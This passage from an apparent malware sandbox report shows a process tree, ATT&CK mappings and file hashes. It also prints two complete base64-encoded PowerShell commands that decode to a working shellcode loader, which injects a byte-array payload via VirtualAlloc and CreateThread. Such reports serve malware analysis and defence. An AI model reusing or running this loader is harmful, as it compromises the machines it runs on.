AAwAHgAYgBjACwAMAB4ADkAMgAsADAAeABjADgALAAwAHgAZgAyACwAMAB4ADEANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA4ADEALAAwAHgAMAA3ACwAMAB4AGUAMwAsADAAeAAyAGUALAAwAHgAMwA0ACwAMAB4ADMANwAsADAAeAA2AGUALAAwAHgAYwA3ACwAMAB4ADUAZgAsADAAeAAzAGYALAAwAHgAOAAyACwAMAB4AGUANwAsADAAeAA5AGYALAAwAHgANQA3ACwAMAB4AGUAMQAsADAAeAAxADcALAAwAHgAYQBhACwAMAB4ADQANwAsADAAeAAxADYALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABmADIALAAwAHgAMgA0ACwAMAB4AGMANQAsADAAeABkADUALAAwAHgANAA5ACwAMAB4ADEANAAsADAAeAA0ADAALAAwAHgAZQA5ACwAMAB4ADYANAAsADAAeAAzADMALAAwAHgAMgBkACwAMAB4ADcAZAAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAZAAsADAAeAA3AGQALAAwAHgAZQBlACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgAMwBkACwAMAB4AGUAZQAsADAAeAA4ADcALAAwAHgAYwA1ACwAMAB4AGUANQAsADAAeAA0AGEALAAwAHgANwA0ACwAMAB4AGYAMwAsADAAeABlADkALAAwAHgANAA3ACwAMAB4AGUAOAAsADAAeABhADgALAAwAHgANAA2ACwAMAB4AGUAZQAsADAAeABlADgALAAwAHgAMQA4ACwAMAB4ADAAMQAsADAAeABmADAALAAwAHgAZAA2ACwAMAB4AGEANgAsADAAeABkADEALAAwAHgAYQAzACwAMAB4ADQAMAAsADAAeABjAGYALAAwAHgAYwAzACwAMAB4AGQANQAsADAAeABlADQALAAwAHgAZQBkACwAMAB4ADEAYgAsADAAeAAwAGMALAAwAHgANwAzACwAMAB4ADMAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGYANwAsADAAeABiADUALAAwAHgANQA5ACwAMAB4AGIAOAAsADAAeAA4AGQALAAwAHgANwBhACwAMAB4ADIAYwAsADAAeABkAGIALAAwAHgAZAA2ACwAMAB4AGIAOQAsADAAeAA5ADAALAAwAHgAYwBiACwAMAB4ADgAZQAsADAAeABjADIALAAwAHgAZAAwACwAMAB4AGYANAAsADAAeAA2ADAALAAwAHgAMAA0ACwAMAB4ADEAZAAsADAAeAAyADQALAAwAHgAYgAyACwAMAB4ADQAMAAsADAAeAA1ADkALAAwAHgAMQA2ACwAMAB4ADgANQAsADAAeAA5ADQALAAwAHgAYgA3ACwAMAB4ADUANwAsADAAeABkADcALAAwAHgAZABkACwAMAB4AGMANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAdQBTAGwAawA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdQBTAGwAawAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdQBTAGwAawAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEYAcwBzACkAKQA7ACQAWgBmAEUAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBXAG0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAZQBXAG0AIAAkAFoAZgBFACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFoAZgBFACAAJABlACIAOwB9AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABzAHUAawAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAdQBrACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkADUALAAwAHgAYgBhACwAMAB4ADQANwAsADAAeAA1AGYALAAwAHgANwA5ACwAMAB4ADYANwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAA4ADMALAAwAHgAZQBlACwAMAB4AGYAYwAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEANgAsADAAeAAwADMALAAwAHgANQA2ACwAMAB4ADEANgAsADAAeABlADIALAAwAHgAYgAyACwAMAB4AGEAMwAsADAAeAA5ADEALAAwAHgAZQA4ACwAMAB4ADMAYwAsADAAeAA1AGMALAAwAHgANgAyACwAMAB4ADkANwAsADAAeAAwAGQALAAwAHgAOABlACwAMAB4ADAANgAsADAAeABkAGMALAAwAHgAMwBmACwAMAB4ADEAZQAsADAAeAA0AGMALAAwAHgAYgAwACwAMAB4AGIAMwAsADAAeABkADUALAAwAHgAMAAwACwAMAB4ADIAMQAsADAAeAA0ADIALAAwAHgAMABjACwAMAB4ADkANQAsADAAeABiADYALAAwAHgAZABmACwAMAB4AGIAZAAsADAAeABmAGUALAAwAHgANAA3ACwAMAB4ADYAOAAsADAAeAAwAGIALAAwAHgAZAA5ACwAMAB4ADYANgAsADAAeAA1ADYALAAwAHgAMgAwACwAMAB4ADEAOQAsADAAeABlADgALAAwAHgAMgBhACwAMAB4ADMAYgAsADAAeAA0AGUALAAwAHgAYwBhACwAMAB4ADEAMwAsADAAeABmADQALAAwAHgAOAAzACwAMAB4ADAAYgAsADAAeAA1ADQALAAwAHgANAAyACwAMAB4AGUAOQAsADAAeABlADQALAAwAHgAMAA4ACwAMAB4ADAAMgAsADAAeAA5AGEALAAwAHgAYQA5ACwAMAB4AGIAYwAsADAAeAAyADcALAAwAHgAZABlACwAMAB4ADcAMQAsADAAeABiAGQALAAwAHgAZQA3ACwAMAB4ADUANAAsADAAeABjADkALAAwAHgAYwA1ACwAMAB4ADgAMgAsADAAeABhAGIALAAwAHgAYgBlACwAMAB4ADcAOQAsADAAeAA4AGMALAAwAHgAZgBiACwAMAB4ADYAZgAsADAAeAAwAGEALAAwAHgAYwA2ACwAMAB4AGUAMwAsADAAeAAwADQALAAwAHgANQA0ACwAMAB4AGYANwAsADAAeAAxADIALAAwAHgAYwA4ACwAMAB4AGUAMQAsADAAeAAzAGUALAAwAHgANgAwACwAMAB4AGQAMgAsADAAeABhADAALAAwAHgANABiACwAMAB4AGIAZAAsADAAeABhADEALAAwAHgAMAAzACwAMAB4AGIAMwAsADAAeABiAGYALAAwAHgANgAzACwAMAB4ADUAMgAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4ADQANAAsADAAeAA5ADkALAAwAHgAYQA3ACwAMAB4ADgAMwAsADAAeAA5AGMALAAwAHgAOQA5ACwAMAB4ADUANwAsADAAeABmADYALAAwAHgAZAA2ACwAMAB4AGQAYQAsADAAeABlAGEALAAwAHgAMAAxACwAMAB4ADIAZAAsADAAeABhADEALAAwAHgAMwAwACwAMAB4ADgANwAsADAAeABiADIALAAwAHgAMAAxACwAMAB4AGIAMgAsADAAeAAzAGYALAAwAHgAMQA3ACwAMAB4AGIAMAAsADAAeAAxADcALAAwAHgAZAA5ACwAMAB4AGQAYwAsADAAeABiAGUALAAwAHgAZABjACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgAYQAyACwAMAB4AGUAMwAsADAAeAA2ADIALAAwAHgAYgAwACwAMAB4AGQAZQAsADAAeAA2ADgALAAwAHgAOAA1ACwAMAB4ADEANwAsADAAeAA1ADcALAAwAHgAMgBhACwAMAB4AGEAMgAsADAAeABiADMALAAwAHgAMwBjACwAMAB4AGUAOAAsADAAeABjAGIALAAwAHgAZQAyACwAMAB4ADkAOAAsADAAeAA1AGYALAAwAHgAZgAzACwAMAB4AGYANQAsADAAeAA0ADQALAAwAHgAMwBmACwAMAB4ADUAMQAsADAAeAA3AGQALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeABlADUALAAwAHgANwBlACwAMAB4ADcAOQAsADAAeAA1ADcALAAwAHgAYgBiACwAMAB4AGUAOAAsADAAeABlAGIALAAwAHgAYwBkACwAMAB4ADMAMAAsADAAeABlADkALAAwAHgAOQBiACwAMAB4ADcAYQAsADAAeABkADAALAAwAHgAOAA3ACwAMAB4ADMAMgAsADAAeABkADEALAAwAHgANABhACwAMAB4ADEANAAsADAAeABiADMALAAwAHgAZgBmACwAMAB4ADgAZAAsADAAeAA1AGIALAAwAHgAZQBlACwAMAB4ADMAMQAsADAAeAA0ADkALAAwAHgAZgAwACwAMAB4ADQAMwAsADAAeAA2ADEALAAwAHgAMwBlACwAMAB4AGEANAAsADAAeAAwAGIALAAwAHgAYgBmACwAMAB4ADkANgAsADAAeAAzADMALAAwAHgANgBjACwAMAB4ADQAMAAsADAAeABjADMALAAwAHgAOQA3ACwAMAB4ADIAMQAsADAAeABkADUALAAwAHgAZQBmACwAMAB4ADQANAAsADAAeAA5ADYALAAwAHgANAAxACwAMAB4ADYAMAAsADAAeAA3ADUALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADEAOAAsADAAeAA5ADIALAAwAHgANgA4ACwAMAB4ADEANAAsADAAeAA0AGQALAAwAHgAYwBiACwAMAB4ADUAYQAsADAAeAAwADAALAAwAHgAMAA3ACwAMAB4AGIAYwAsADAAeABiADcALAAwAHgAYgBkACwAMAB4ADgAMwAsADAAeAAyADYALAAwAHgAYQA5ACwAMAB4ADYAOQAsADAAeAA2ADcALAAwAHgAZgBkACwAMAB4ADYAMAAsADAAeABlADEALAAwAHgANABlACwAMAB4ADQAMwAsADAAeAAwADIALAAwAHgAMwA0ACwAMAB4AGMAMAAsADAAeAAxADIALAAwAHgAZAA1ACwAMAB4ADQAMwAsADAAeAAxADEALAAwAHgAZQBmACwAMAB4ADIAYwAsADAAeABlADAALAAwAHgANgA5ACwAMAB4ADAAZgAsADAAeAAxAGYALAAwAHgAOQAwACwAMAB4AGQAZQAsADAAeAA4ADYALAAwAHgAMAAwACwAMAB4AGEANgAsADAAeAAxAGYALAAwAHgANABkACwAMAB4AGIANwAsADAAeABlADEALAAwAHgAOABjACwAMAB4ADAANgAsADAAeABjADgALAAwAHgAZABmACwAMAB4AGQAYQAsADAAeAA1ADMALAAwAHgAOQBiACwAMAB4ADQAYwAsADAAeAA0ADkALAAwAHgAMABiACwAMAB4ADQAZgAsADAAeAAyADUALAAwAHgAMAA1ACwAMAB4ADUAOAAsADAAeAAzAGEALAAwAHgAZQA3ACwAMAB4AGUAZQAsADAAeAA2ADEALAAwAHgAMQAwACwAMAB4ADYAMQAsADAAeAA3AGEALAAwAHgAOQA0ACwAMAB4AGMANAAsADAAeABlADYALAAwAHgAZgBhACwAMAB4ADkAYgAsADAAeABmAGEALAAwAHgAZgA2ACwAMAB4ADcAMwAsADAAeAAzAGIALAAwAHgAOQAwACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAZAA2ACwAMAB4ADcAYQAsADAAeABhAGQALAAwAHgAYgBiACwAMAB4ADUAMwAsADAAeABjADMALAAwAHgAYwBmACwAMAB4AGIAZAAsADAAeAA2ADMALAAwAHgAMQBlACwAMAB4AGIAYwAsADAAeAA5ADIALAAwAHgAYwA4ACwAMAB4AGYAMgAsADAAeAAxADUALAAwAHgANwBjACwAMAB4AGMAMgAsADAAeABmADIALAAwAHgAOAAxACwAMAB4ADAANwAsADAAeABlADMALAAwAHgAMgBlACwAMAB4ADMANAAsADAAeAAzADcALAAwAHgANgBlACwAMAB4AGMANwAsADAAeAA1AGYALAAwAHgAMwBmACwAMAB4ADgAMgAsADAAeABlADcALAAwAHgAOQBmACwAMAB4ADUANwAsADAAeABlADEALAAwAHgAMQA3ACwAMAB4AGEAYQAsADAAeAA0ADcALAAwAHgAMQA2ACwAMAB4ADAAMgAsADAAeAA5AGEALAAwAHgAZgAyACwAMAB4ADIANAAsADAAeABjADUALAAwAHgAZAA1ACwAMAB4ADQAOQAsADAAeAAxADQALAAwAHgANAAwACwAMAB4AGUAOQAsADAAeAA2ADQALAAwAHgAMwAzACwAMAB4ADIAZAAsADAAeAA3AGQALAAwAHgAOAA2ACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgANwBkACwAMAB4AGUAZQAsADAAeABkADQALAAwAHgAYQBkACwAMAB4ADMAZAAsADAAeABlAGUALAAwAHgAOAA3ACwAMAB4AGMANQAsADAAeABlADUALAAwAHgANABhACwAMAB4ADcANAAsADAAeABmADMALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeABlADgALAAwAHgAYQA4ACwAMAB4ADQANgAsADAAeABlAGUALAAwAHgAZQA4ACwAMAB4ADEAOAAsADAAeAAwADEALAAwAHgAZgAwACwAMAB4AGQANgAsADAAeABhADYALAAwAHgAZAAxACwAMAB4AGEAMwAsADAAeAA0ADAALAAwAHgAYwBmACwAMAB4AGMAMwAsADAAeABkADUALAAwAHgAZQA0ACwAMAB4AGUAZAAsADAAeAAxAGIALAAwAHgAMABjACwAMAB4ADcAMwAsADAAeAAzADEALAAwAHgAOQA3ACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAYgA1ACwAMAB4ADUAOQAsADAAeABiADgALAAwAHgAOABkACwAMAB4ADcAYQAsADAAeAAyAGMALAAwAHgAZABiACwAMAB4AGQANgAsADAAeABiADkALAAwAHgAOQAwACwAMAB4AGMAYgAsADAAeAA4AGUALAAwAHgAYwAyACwAMAB4AGQAMAAsADAAeABmADQALAAwAHgANgAwACwAMAB4ADAANAAsADAAeAAxAGQALAAwAHgAMgA0ACwAMAB4AGIAMgAsADAAeAA0ADAALAAwAHgANQA5ACwAMAB4ADEANgAsADAAeAA4ADUALAAwAHgAOQA0ACwAMAB4AGIANwAsADAAeAA1ADcALAAwAHgAZAA3ACwAMAB4AGQAZAAsADAAeABjADcAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHUAUwBsAGsAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHUAUwBsAGsALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHUAUwBsAGsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2656
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pzi2eslb.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1036
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5977.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5976.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES5977.tmp

Filesize
1KB

MD5
62b6b059c611dae2ef34e22df4bd84a0

SHA1
bd8abcf1d6c94e43f2fdb9be817ed5d90d20666c

SHA256
d015caa0cef2256f1606dc639bdea08067e423e346023f9914fc81ee21b330de

SHA512
79df3c9b7fec6ebd4fdc356cac45a5da2b60f0a42a036786bdc1a38e669a19ec71d7cc28c4cc406b6892a2703ed5966cb3bf1d39549fe5f62351f608fb3f7ce8

Download Submit
C:\Users\Admin\AppData\Local\Temp\pzi2eslb.dll

Filesize
3KB

MD5
c693c274f471b9bca60bd6551688695c

SHA1
5e288e1fe677ec6c6bd1cc9d6ed3ecc1f8d72e86

SHA256
42bccee426ec7fb9d6db2aef166acbfb6eb33543af83e2123e20f505b1ad8571

SHA512
6a6d3cf7c20dd8f4884b976c171af9c1d3442edcda164da2cc6f73515992ef0751b46033c3385bd96f824a022684d493369b5d26ba20723f3eb05b487d04717b

Download Submit
C:\Users\Admin\AppData\Local\Temp\pzi2eslb.pdb

Filesize
7KB

MD5
a54f63932bfe4052228e9cd9826ebf2e

SHA1
c16ef57fab3fe85cfc173cf1364ef03ea75b0697

SHA256
6af465114e0ac85b8abe78356b7ebde90f4e688381e1e7809b572ff8f4ccfc2a

SHA512
24825d2b5a566e35a70dbf9c257342e7641c52d5ccd32bccc3dd9c3a2673a300a51690540bebbedf90da90d81d9aeeeb2044a7becaa03e21446f8e617ceb5776

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f4a2a97f865c3198eef7b24bb6e6c5e1

SHA1
c02f6ebc3d731721f3727805b22ae4ca84a85a81

SHA256
600cf5b74a5e443bbc059f01f7fdd47da7a4901715df2ef3b400a2e3a26ee72f

SHA512
711fc5f8a2b210aa7b5800fe83ee0a538f5e16c3cd2c184599fb9de8eed4bb52acf7938f89fdc0822d86cf581c9069bdc4cdeca27d2c56142aefa94f46dc2dcf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC5976.tmp

Filesize
652B

MD5
dea030e45302dbae91117fe8e17ca5ed

SHA1
1d167bb2ceb1d53d8a0e90e3b74e95e3237b1216

SHA256
2d7db3bf936b387b6ec1faed6d98f95e0d5ec44ce4bb4e0f029822c1a4ae6ebe

SHA512
da2a0b683379084dbb64f51d2ad588d89646c4158bbad5c96d1df89e1d22cdeba526027376f9b42316557b24450f4becd1da7134217b57e9562c842c1c8a3b51

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pzi2eslb.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pzi2eslb.cmdline

Filesize
309B

MD5
717433794677fe03c1e94fe7d17d86fe

SHA1
54681cb4dd204e8fd18327a8fffd58c0e95c9f0a

SHA256
9e1b0e9370112f3c7175c3fbd5137399e92b9b50cb4c164b48e22c3d6c0362ad

SHA512
424817ac26ad271ae8d0f08a196028a16089edd4aa733c5c749893ec9daaea677fa0b5bb911282a690a4581f65df48d324cf011d5cb93caab8fe4bac03cbf553

Download Submit
memory/2456-17-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2456-18-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2456-46-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2456-20-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2456-19-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2656-45-0x0000000004740000-0x0000000004741000-memory.dmp

Filesize
4KB

Download
memory/2776-29-0x000007FEF680E000-0x000007FEF680F000-memory.dmp

Filesize
4KB

Download
memory/2776-11-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2776-10-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2776-9-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2776-8-0x0000000002490000-0x0000000002498000-memory.dmp

Filesize
32KB

Download
memory/2776-6-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2776-7-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download
memory/2776-5-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2776-28-0x000007FEF6550000-0x000007FEF6EED000-memory.dmp

Filesize
9.6MB

Download
memory/2776-4-0x000007FEF680E000-0x000007FEF680F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads